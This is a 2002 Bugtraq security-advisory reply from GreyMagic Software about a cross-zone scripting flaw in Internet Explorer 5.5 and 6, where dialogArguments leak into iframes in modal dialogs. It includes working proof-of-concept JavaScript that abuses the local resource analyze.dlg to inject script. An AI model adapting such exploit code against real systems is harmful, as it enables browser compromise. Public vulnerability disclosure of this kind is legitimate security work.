Bugtraq mailing list archives
RE: (MSIE) -"dialogArguments" (extended)
From: "GreyMagic Software" <security () greymagic com>
Date: Wed, 20 Nov 2002 10:55:17 +0200
IFRAME in a page opened by "openModalDialog" has "dialogArguments" of its parent.
The method is "showModalDialog" and not "openModalDialog". It's worth noting that "showModelessDialog" is also vulnerable.
/*note: please tell me if "MSIE SP1" allows an internet page contains an iframe with local content*/
Normally, it doesn't. But it seems like Microsoft applied that rule to normal windows and forgot to do the same for dialogs.
in the demo: (*)"victim zone" is localzone; (*)the page from victim zone is "res://shdoclc.dll/privacypolicy.dlg"; it uses "cookieUrl" without filtering.
This vulnerability is very similar to the redirect vulnerability in dialogs presented by Thor Larholm back in March and it has the same impact. But just like Larholm's initial advisory was confined to IE 6, Liu's is confined to IE 6 as well. This is a result of using "privacypolicy.dlg" for exploitation, which was not shipped prior to version 6. However, IE 5.5 is also vulnerable, and can be exploited by using the "analyze.dlg" resource, which we published immediately after Thor's advisory at the time. Notice that IE 5.0 is not vulnerable to this flaw at all. It seems like many of the recent IE vulnerabilities emerge from the global change made to windows (including frames and iframes) in IE 5.5. The following proof-of-concept code will work on both (fully patched) IE 5.5 and IE 6: /* Online demonstration at http://security.greymagic.com/misc/globalDgArg/ */ function oExploit(iSec) { return { rel:"stylesheet", readyState:"exploit", href:sHTML }; } oExploit.length=1; var sHTML="<scr\ipt defer>alert(location.href)</scr\ipt>", oSecurity={ document:{ all:{ tags:function (sTag) { return sTag=="link" ? oExploit : []; } } } } // base.html contains <iframe src="res://shdoclc.dll/analyze.dlg"></iframe> showModalDialog("base.html",oSecurity);
Current thread:
- (MSIE) when parent gives his son bad things ;) --"dialogArguments " again Liu Die Yu (Nov 19)
- Re: (MSIE) when parent gives his son bad things ;) --"dialogArguments " again Dave Ahmad (Nov 19)
- RE: (MSIE) -"dialogArguments" (extended) GreyMagic Software (Nov 23)